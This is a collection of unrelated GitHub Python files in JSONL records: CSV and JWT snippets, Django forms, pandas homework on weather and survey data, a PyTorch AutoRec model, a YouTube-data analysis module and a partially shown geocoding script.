+{"seq_id":"24850120477","text":"\"\"\"\n创建csv对象\ncsv.writer(fileobj)\n放入一个可迭代类型对象,写在一行,每一个元素是一列\ncsv.writerow(iterable)\n\n放入一个可迭代类型的元素,这个元素中的每一个子元素也必须可迭代\n每一个子元素占一行,子元素又会被拆开占据多列,长度取决于自身\ncsv.writerows(Iterable(Iterable))\n\n\"\"\"\nimport csv\n\n# 创建流对象\nfile = open(\"demo07.csv\", mode=\"w\", encoding=\"utf-8\")\n# 创建csv对象\ncsv_writer = csv.writer(file)\n# 写入内容\ncsv_writer.writerow([\"a\", \"b\", \"c\", \"d\", \"e\"])\n\n# csv_writer.writerows([[1, 2, 3], \"world\", \"say\", \"byebye\"])\n# 关闭流\nfile.close()\n","repo_name":"xvjingcheng/superman","sub_path":"千峰的每天/第十三天12.27/代码/Day13/07.csv写入文件.py","file_name":"07.csv写入文件.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23870524793","text":"#!/bin/env python3\nimport jwt\n\nfrom cryptography.x509 import load_pem_x509_certificate\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\n\npayload_data = {\n \"iss\": \"0d674da4ac7611eda8f78f77fa521b6e\"\n}\n\n# key_file = open('server.key', 'rb+')\n# private_bytes = key_file.read()\n# private_key = serialization.load_pem_private_key(\n# private_bytes, None, backend=default_backend()\n# )\n# cert_file = open('server.crt', 'rb+')\n# cert_str = cert_file.read()\n# cert_obj = load_pem_x509_certificate(cert_str)\n# public_key = cert_obj.public_key()\n# token = jwt.encode(payload_data, private_key, algorithm=\"RS256\")\n# print(jwt.decode(token, public_key, algorithms=['RS256', ]))\n\nmy_secret = 'guest'\n\ntoken = jwt.encode(\n payload=payload_data,\n key=my_secret,\n algorithm=\"HS256\"\n)\nprint(token)\n\n# print(jwt.decode(token, key=my_secret, algorithms=['HS256', ]))\n","repo_name":"relaypro-open/dog_api_python","sub_path":"src/jwt_test.py","file_name":"jwt_test.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19215730048","text":"from django import forms\nfrom djmoney.forms import MoneyField\nfrom django.forms import ModelForm, Form\n\nfrom .models import Fazenda, FazendaMedia\nimport re\n\nestados = (('',''),('AC','Acre AC'),('AL','Alagoas AL'),('AP','Amapá AP'),\n ('AM','Amazonas AM'),('BA','Bahia BA'),('CE','Ceará CE'),\n ('DF','Distrito Federal DF'),('ES','Espírito Santo ES'),\n ('GO','Goiás GO'),('MA','Maranhão MA'),('MT','Mato Grosso MT'),\n ('MS','Mato Grosso do Sul MS'),('MG','Minas Gerais MG'),('PA','Pará PA'),\n ('PB','Paraíba PB'),('PR','Paraná PR'),('PE','Pernambuco PE'),('PI','Piauí PI'),\n ('RJ','Rio de Janeiro RJ'),('RN','Rio Grande do Norte RN'),\n ('RS','Rio Grande do Sul RS'),('RO','Rondônia RO'),('RR','Roraima RR'),\n ('SC','Santa Catarina SC'),('SP','São Paulo SP'),('SE','Sergipe SE'),\n ('TO','Tocantins TO'))\n\nculturas = (('Lavoura','Lavoura'),('Pecuária','Pecuária'),('Dupla Aptidão','Dupla Aptidão'))\n\nclass FazendaForm(ModelForm):\n class Meta:\n model = Fazenda\n fields = ('nome', 'municipio', 'estado', \n 'area_total', 'area_aberta',\n 'cultura', 'infra', 'maquinario',\n 'local_ref', 'coordenada', 'valor',\n 'obs', 'encaminhado', 'oferta')\n\n nome = forms.CharField(label='nome', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n municipio = forms.CharField(label='municipio', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'})) \n\n estado = forms.CharField(label='estado', widget=forms.Select({\n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=estados))\n\n area_total = forms.IntegerField(label='area_total',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n area_aberta = forms.IntegerField(label='area_aberta',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n cultura = forms.CharField(label='cultura', widget=forms.Select(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=culturas))\n\n infra = forms.CharField(label='infra', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n maquinario = forms.CharField(label='maquinario', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n local_ref = forms.CharField(label='local_ref', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n coordenada = forms.CharField(label='coordenada', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n valor = forms.Form('valor',)\n\n obs = forms.CharField(label='obs', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4' }))\n \n encaminhado = forms.CharField(label='encaminhado', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n oferta = forms.CharField(label='oferta', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n\nclass UploadMedia(forms.Form):\n class Meta:\n model = FazendaMedia\n fields = ('imagem', 'video', 'audio')\n\n imagens = forms.FileField(label='imagem', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True,}))\n \n videos = forms.FileField(label='video', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n audios = forms.FileField(label='audio', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\nclass SearchForm(forms.Form):\n \n estado = forms.ChoiceField(\n widget=forms.Select(attrs={'class':'form-control',}), #'style':r'padding-left: calc(50% - 1em)' Para momdile\n choices=estados, \n initial=\"\",\n required=False)\n \n municipio = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete':'off',}),\n required=False)\n\n area_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}), \n required=False)\n\n area_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',\n 'oninput':\"this.form.range_area_max.value=this.value\"}), \n required=False)\n \n valor_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}),\n required=False)\n\n valor_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2', \n 'autocomplete': 'off',}),\n required=False,\n )","repo_name":"gconelhero/Fazendas","sub_path":"cadastro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23801200794","text":"import pandas as ps\n\"\"\"Readng the given csv and putting NaN values in place of **\"\"\"\ndata=ps.read_csv('6153237444115dat.csv',na_values=['*', '**', '***', '****', '*****', '******'])\n\n\n#PROBLEM FIRST\nprint(\"ANS OF FIRST PROBLEM\")\n\n\"\"\"- How many rows is there in the data?\n- What are the column names?\n- What are the datatypes of the columns?\n- What is the mean Fahrenheit temperature in the data? (`TEMP` column)\n- What is the standard deviation of the Maximum temperature? (`MAX` column)\n- How many unique stations exists in the data? (`USAF` column)\"\"\"\n\n\n\nprint('Total no. of row:',data.__len__())\nname=data.columns\nprint('Total columns ')\nfor i in name:\n print(i)\nprint('Datatypes:',data.dtypes)\nprint('mean od temp:',data['TEMP'].mean())\nprint('deviation of MAX:',data['MAX'].std())\nprint('unique',data['USAF'].unique())\n\n#PROBLEM TWO\nprint(\"ANS OF SECOUND\")\n\"\"\" - Select from the `data` columns `USAF, YR--MODAHRMN, TEMP, MAX, MIN` and assign them into a new variable called `selected`\n - Remove all rows from `selected` that has NoData in column `TEMP` using `dropna()` -function\n - Convert the Fahrenheit temperatures from `TEMP` into a new column `Celsius` using the conversion formula\n - Round the values in `Celsius` to have 0 decimals (**don't** create a new column --> update the current one)\n - Convert the `Celsius` values into integers (**don't** create a new column --> update the current one)\"\"\"\n\nselected=ps.concat([data['USAF'],data['YR--MODAHRMN'],data['TEMP'],data['MAX'],data['MIN']],axis=1)\n\nselected=selected.dropna(subset=['TEMP'])\n\nfor i in selected['TEMP']:\n convert(i)\n\n\nselected['Celsius']=a\nb=selected['Celsius'].round()\nselected.update(b)\na.clear()\nfor i in selected['Celsius']:\n a.append(int(i))\nselected['Celsius']=a\n\nprint(selected)\n\n#THIRD\nprint('ans of two')\n\"\"\"- Divide the selection into two separate datasets:\n - Select all rows from `selected` DataFrame into variable called `kumpula` where the `USAF` code is `29980`\n - Select all rows from `selected` DataFrame into variable called `rovaniemi` where the `USAF` code is `28450`\n- Save `kumpula` DataFrame into `Kumpula_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\n- Save `rovaniemi` DataFrame into `Rovaniemi_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\"\"\"\n\nkumpula=selected[selected['USAF']==29980]\nrovaniemi=selected[selected['USAF']==28450]\n\nkumpula.to_csv('Kumpula_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\nrovaniemi.to_csv('Rovaniemi_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\n#FORTH\nprint(\"ANS OF FORTH(part 1)\")\n\"\"\"**Part 1**\n\n- What was the median temperature in:\n - Helsinki Kumpula?\n - Rovaniemi?\"\"\"\nprint(kumpula['TEMP'].median())\nprint(rovaniemi['TEMP'].median())\nprint(\"ANS OF FORTH(part 2)\")\n\"\"\"\n- Select from `rovaniemi` and `kumpula` DataFrames such rows from the DataFrames where ``YR--MODAHRMN`` values are from May 2017 (see hints for help)\nand assign them into variables `rovaniemi_may` and `kumpula_may`\n- Do similar procedure for June and assign those values into variables `rovaniemi_june` and `kumpula_june`\n- Using those new subsets print the mean, min and max temperatures for both places in May and June.\"\"\"\nrovaniemi_may=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201705]\nkumpula_may=kumpula[kumpula['YR--MODAHRMN']//1000000==201705]\n\nrovaniemi_june=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201706]\nkumpula_june=kumpula[kumpula['YR--MODAHRMN']//1000000==201706]\n\nprint(kumpula_june['TEMP'].mean())\nprint(rovaniemi_june['TEMP'].mean())\nprint(kumpula_may['TEMP'].mean())\nprint(rovaniemi_may['TEMP'].mean())\n#FIFTH\nprint(\"ANS OF FIFTH\")\n\"\"\" - create a new DataFrame where you have calculated mean, max and min temperatures for each day separately using the\n hourly values from Rovaniemi and Helsinki Kumpula.\n - this problem is a classical data aggregation problem\"\"\"\na.clear()\nb=rovaniemi[['YR--MODAHRMN','TEMP']]\nfor i in b['YR--MODAHRMN']:\n a.append(i//100)\nb['YR--MODAHRMN']=a\nc=b.groupby('YR--MODAHRMN')\na.clear()\nb=[]\nce=[]\nh=[]\nfor x,y in c:\n a.append(y['TEMP'].mean())\n b.append(y['TEMP'].max())\n ce.append(y['TEMP'].min())\n h.append(x)\nd=ps.DataFrame({\n 'hour':h,\n 'mean':a,\n 'max':b,\n 'min':ce\n})\nd\n","repo_name":"lusiferjr/Pandas","sub_path":"project_1/data_exploration.py","file_name":"data_exploration.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"26148430140","text":"class Diff2D:\n def __init__(self, m, n) -> None:\n self.m = m\n self.n = n\n\n self.diff = [[0]*(n+1) for _ in range(m+1)]\n self.result = [[0]*(n+1) for _ in range(m+1)]\n\n def set(self, x0, y0, x1, y1, val):\n \"\"\"\n top-left: (x0, y0)\n bottom-right: (x1, y1)\n \"\"\"\n diff = self.diff\n\n # 排容原理\n diff[x0][y0] += val\n diff[x0][y1+1] -= val\n diff[x1+1][y0] -= val\n diff[x1+1][y1+1] += val\n\n def compute(self):\n diff, result = self.diff, self.result\n\n # c b\n # a current\n result[0][0] = diff[0][0]\n for i in range(self.m):\n for j in range(self.n):\n a = result[i-1][j] if i-1 >= 0 else 0\n b = result[i][j-1] if j-1>= 0 else 0\n c = result[i-1][j-1] if i-1>=0 and j-1>=0 else 0\n result[i][j] = a + b - c + diff[i][j]\n","repo_name":"Vergil0327/leetcode-history","sub_path":"PrefixSum/DiffSum/2D-Difference Array/diff_2d.py","file_name":"diff_2d.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37414717731","text":"\"\"\"183. Customers Who Never Order\"\"\"\n\nimport pandas as pd\n\n\ndef find_customers(customers: pd.DataFrame, orders: pd.DataFrame) -> pd.DataFrame:\n result = customers[~customers.id.isin(orders[\"customerId\"])]\n\n result[\"Customers\"] = result[\"name\"]\n\n return result[[\"Customers\"]]\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/0183.py","file_name":"0183.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5648677389","text":"import numpy as np\nimport torch\nfrom torch import nn\n\n\nclass AutoRec(nn.Module):\n def __init__(self, num_user, latent_dim, dropout):\n super().__init__()\n self.encoder = nn.Linear(num_user, latent_dim)\n self.decoder = nn.Linear(latent_dim, num_user)\n self.dropout = nn.Dropout(dropout)\n self.relu = nn.ReLU()\n self.sig = nn.Sigmoid()\n\n def forward(self, x):\n out = self.encoder(x)\n # out = self.relu(out)\n out = self.sig(out)\n out = self.dropout(out)\n out = self.decoder(out)\n # out = self.relu(out)\n # Mask the gradient of unobserved user-item interaction during training\n if torch.is_grad_enabled():\n out = out * torch.sign(x)\n return out\n\n","repo_name":"gmsft/rec","sub_path":"models/AutoRec.py","file_name":"AutoRec.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70626828808","text":"import pandas as pd \nimport numpy \nimport scipy.stats as stats \nimport seaborn as sns\nimport matplotlib.pyplot as plot\n\nprint ('reading data file...')\ndata = pd.read_csv('nesarc_pds.csv', low_memory=False)\ndata.columns = map(str.upper, data.columns)\n\n# bug fix for display formats to avoid run time errors - put after code for loading data above\npd.set_option('display.float_format', lambda x:'%f'%x)\npd.set_option('display.max_rows', None)\n# Current drinkers(CONSUMER - DRINKING STATUS ) Either 1 (yes) or 2(no) to (S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA)\ndrinkerstemp=data[(data['CONSUMER'] ==1) & ((data['S7Q31A']=='1') | (data['S7Q31A']=='2'))]\n\n#Get rid of everything unneeded \ndrinkers = drinkerstemp[['S7Q31A','S2AQ8B','S2AQ8C','S2AQ10','S2BQ1A2','S2BQ1A4','S2BQ1A7', 'S2BQ1A8','S2BQ3B']].copy()\n\ndel drinkerstemp \ndel data\n\nfor col in drinkers: # Convert columns to numeric and replace 99's and nulls\n drinkers[col] = drinkers[col].convert_objects(convert_numeric=True)\n drinkers[col]=drinkers[col].replace(99 ,numpy.nan).fillna(numpy.nan)\n\nfor col in ['S2BQ1A2','S2BQ1A4','S2BQ1A7']: # Set missing values to Nan\n drinkers[col]=drinkers[col].replace(9 ,numpy.nan).fillna(numpy.nan)\n\ndrinkers['S7Q31A'] = drinkers['S7Q31A'].map({1:'SA',2:'NO_SA'}) # Give S7Q31A more intuitive names\n\n#PEARSON\n\ndrinkers_clean = drinkers[['S2BQ3B','S2AQ8B']].dropna()\n\nplt = sns.regplot(drinkers_clean['S2AQ8B'],drinkers_clean['S2BQ3B'])\nplt.set(xlabel='Number of drinks usually consumed', ylabel='Number of episodes of alcohol abuse')\n\nstats.pearsonr(drinkers_clean['S2BQ3B'],drinkers_clean['S2AQ8B'])\n\n#S2AQ10 - HOW OFTEN DRANK ENOUGH TO FEEL INTOXICATED IN LAST 12 MONTHS')\n#S2AQ8B NUMBER OF DRINKS OF ANY ALCOHOL USUALLY CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n#S2AQ8C LARGEST NUMBER OF DRINKS OF ANY ALCOHOL CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED')\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT')\n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED')\n#S2BQ1A8 - EVER HAVE PERIOD WHEN KEPT DRINKING LONGER THAN INTENDED') \n#S2BQ3B - NUMBER OF EPISODES OF ALCOHOL ABUSE)\n","repo_name":"jamesrmccallum/Coursera","sub_path":"Pearson/Corr_Co.py","file_name":"Corr_Co.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18526785989","text":"import pandas as pd\nimport numpy as np\nimport string\nfrom collections import Counter\nfrom PIL import Image\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport sys\nimport dateutil.parser\nimport isodate\nimport scipy.stats as stats\nimport datetime\nfrom matplotlib.gridspec import GridSpec\n\ndef pareto_plot(df, \n x=None, \n y=None, \n title=None, \n number_categories = 10, \n show_pct_y=False, \n pct_format='{0:.0%}'):\n \n '''adapted from mostly from https://tylermarrs.com/posts/pareto-plot-with-matplotlib/ except as indicated'''\n\n import matplotlib.pyplot as plt\n\n dfplot = df[[x,y]]\n\n dfsorted = dfplot.sort_values(y, ascending=False)\n \n df_shortened = dfsorted[0:number_categories] #added for when there are too many categories to plot\n df_remaining = dfsorted[number_categories:df.shape[0]]\n \n xlabel = x\n ylabel = y\n tmp = df_shortened.sort_values(y, ascending=False)\n tmp = tmp.append({x : 'Other' , y : df_remaining[y].abs().sum()}\n , ignore_index=True) #adds in an other category which has the sum of the remainder\n x = tmp[x].values\n y = tmp[y].values\n weights = y / y.sum()\n cumsum = weights.cumsum()\n\n \n fig, ax1 = plt.subplots(figsize = (6,6)) #figsize adjusted to account for rotated labels\n ax1.bar(x, y)\n ax1.set_xlabel(xlabel)\n ax1.tick_params(axis = 'x', rotation = 90) #rotation for longer category names\n ax1.set_ylabel(ylabel)\n \n ax2 = ax1.twinx()\n #ax2.ylim(0, 1.0) \n ax2.plot(x, cumsum, '-ro', alpha=0.5)\n ax2.set_ylabel('', color='r')\n ax2.tick_params('y', colors='k', rotation = 'auto')\n ax2.set_ylim([0,1])\n \n \n vals = ax2.get_yticks()\n ax2.set_yticklabels(['{:,.2%}'.format(x) for x in vals])\n\n # hide y-labels on right side\n if not show_pct_y:\n ax2.set_yticks([])\n \n formatted_weights = [pct_format.format(x) for x in cumsum]\n for i, txt in enumerate(formatted_weights):\n ax2.annotate(txt, (x[i], cumsum[i]), fontweight='heavy') \n \n if title:\n plt.title(title)\n \n plt.tight_layout()\n plt.show();\n\ndef sorted_bar_plot(df,x,y):\n\n dfplot = df[[x, y]]\n dfsorted = dfplot.sort_values(y, ascending=False)\n\n #dfplot.head()\n\n xlabel = x\n ylabel = y\n\n x = dfsorted[x].values\n y = dfsorted[y].values\n\n fig, ax = plt.subplots(figsize = (12, 6))\n\n ax.bar(x,y)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.tick_params(axis = 'x', rotation = 90)\n\ndef plot_relationships(df, x, y, title=None, xlim=None, ylim=None):\n '''x vs y scatterplot with an uneccesarily complicated name\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n \n x = dfplot[x].values\n y = dfplot[y].values\n \n fig, ax1 = plt.subplots(figsize = (6,6))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.set_xlim(xlim)\n ax1.set_ylim(ylim)\n\ndef label_points(x, y, val, ax='ax'):\n '''labels points on a scatterplot\n '''\n a = pd.concat({'x': x, 'y': y, 'val': val}, axis=1)\n for i, point in a.iterrows():\n ax.text(point['x'], point['y'], str(point['val']))\n\ndef plot_with_line_of_fit(df,x,y,title=None):\n '''produces an x vs y scatter plot with a linear line of best fit\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(\n x,\n y)\n\n line = slope*x+intercept\n\n\n fig, ax1 = plt.subplots(figsize = (6,4))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.plot(x, line)\n\ndef line_of_fit(df, x, y):\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n \n line = slope*x + intercept\n \n return line\n\ndef word_count(df, col):\n '''while this is used to make a word count, it really just generates three\n lists of words.\n Index 0 = all words in a list of lists\n Index 1 = all words in a singe, flat list\n Index 2 = unique list of words\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud(df, col):\n '''adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count(df,col)[1]))\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\nvideo_deets_df = pd.read_csv('../data/video_deets_df.csv')\n\ntitle_dict = {}\nfor i in video_deets_df['channelTitle'].unique():\n value = i.lower().split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in value]\n title_dict[i] = no_punctuation\n\nflat_title_words = []\nfor sublist in list(title_dict.values()):\n for item in sublist:\n flat_title_words.append(item)\nunique_title_words = list(np.unique(flat_title_words))\n\ndef word_count_omit_words(df, col, omit_words = title_dict):\n '''Something in this function doesn't quote work, but the intention was to\n use this, for instance, to make a word cloud of words that are in the video\n title, but NOT in the channel titel.\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n for j in no_punctuation:\n if j not in omit_words:\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud_omit_words(df, col):\n '''Accompanying function to word_count_omit_words\n adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count_omit_words(df,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\ndef create_sub_df(chan,col):\n video_title_df = video_deets_df[['channelTitle',col,'viewCount']]\n data = video_title_df[video_title_df['channelTitle']==chan]\n data = data[[col,'viewCount']]\n data_dict = {}\n\n for i, row in data.iterrows():\n data_dict[i] = [row['viewCount'],row[col].lower().split()]\n \n return data, data_dict\n\ndef top_videos_per_channel(chan, quant):\n '''Returns the top quant % videos from channel = chan'''\n df = video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n return df\n\ndef wordcloud_all_vs_top_words_per_channel(df, chan, col, quant):\n #### from https://www.datacamp.com/community/tutorials/wordcloud-python\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud1 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[video_deets_df.channelTitle == chan]\n ,col)[1])\n )\n wordcloud2 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n ,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig = plt.figure(figsize=(12,12))#subplots(1,2, figsize=(12,12))\n fig.suptitle(\"Most Popular Words in {} from {}\".format(col, chan), y=.65, fontsize=18)\n gs = fig.add_gridspec(1, 2)\n \n ax1 = fig.add_subplot(gs[0, 0])\n ax1.imshow(wordcloud1, interpolation='bilinear')\n ax1.axis(\"off\")\n ax1.set_title('All Videos')\n \n ax2 = fig.add_subplot(gs[0, 1])\n ax2.imshow(wordcloud2, interpolation='bilinear')\n ax2.axis(\"off\")\n ax2.set_title('{}% Most Popular Videos'.format(round((1-quant)*100)))\n\ndef channel_hist(chan, mostviews, quant):\n \n data = create_sub_df(chan,'videoTitle')[0].viewCount\n \n fig, ax = plt.subplots()\n\n N, bins, patches = ax.hist(data,\n edgecolor='white', \n linewidth=1, \n bins = 30,\n range = (0,mostviews))\n\n for patch, leftside, rightside in zip(patches, bins[:-1], bins[1:]):\n if rightside > np.percentile(data,quant):\n patch.set_facecolor('r')\n \n ax.set_xlabel('Views')\n ax.tick_params(axis = 'x', rotation = 90)\n ax.set_ylabel('Video Count')\n ax.set_title('Distribution of Views for {}'.format(chan))","repo_name":"scottfeldmanpeabody/MTB-YouTube-EDA","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42195509665","text":"import mysql.connector\nimport ogr\nimport pycountry\nimport dbconfig\n\n# find cities without geo information in db, and add geo info via ESRI\n\n# because getting the data from db takes some time, we cache it in a file\n# called 'cities_nogeo.p'\n\ndb = mysql.connector.connect(user=dbconfig.user, password=dbconfig.password\n\t\t\t\t\t\t\t, host='localhost', database = 'bt')\n\ncursor = db.cursor(buffered = True)\n\nsql = (\"SELECT f_city, f_country FROM ot WHERE f_lon IS NULL AND f_lat IS NULL AND f_city IS NOT NULL AND f_country IS NOT NULL GROUP BY f_lon, f_lat, f_city, f_country;\")\n\ncursor.execute(sql)\nresult = cursor.fetchall()\ndata = [row for row in result]\n\ncursor.close()\ndb.close()\n\t\ndrv = ogr.GetDriverByName('ESRI Shapefile')\nds2_in = drv.Open(\"shapes/gadm28_adm2.shp\")\nlyr2_in = ds2_in.GetLayer(0)\nds3_in = drv.Open(\"shapes/gadm28_adm3.shp\")\nlyr3_in = ds3_in.GetLayer(0)\nds4_in = drv.Open(\"shapes/gadm28_adm4.shp\")\nlyr4_in = ds4_in.GetLayer(0)\n\ndef checkCity(layer, field, data):\n\tfound = []\n\tfailed = []\n\tfor (city, country) in data:\n\t\tc3 = pycountry.countries.get(alpha_2=country).alpha_3\n\t\tf = False\n\t\tfor feature in layer:\n\t\t\tcityname = feature.GetField(field)\n\t\t\tiso = feature.GetField('ISO')\n\t\t\tif (iso == c3 and cityname is not None and cityname.decode('utf-8') == city):\n\t\t\t\tgeo = feature.GetGeometryRef().Centroid()\n\t\t\t\tfound.append((city, country, geo)) \n\t\t\t\tf = True\n\t\tlayer.ResetReading()\n\t\tif not f:\n\t\t\tfailed.append((city, country))\n\n\treturn {'found':found,'notfound':failed}\n\t\n# we test against different types of municipalities and districts\n# orders matters, we want to go from smaller to bigger units\nassigned = []\nresult = checkCity(lyr4_in, 'NAME_4', data)\nassigned = assigned + result['found']\nresult = checkCity(lyr3_in, 'NAME_3', result['notfound'])\nassigned = assigned + 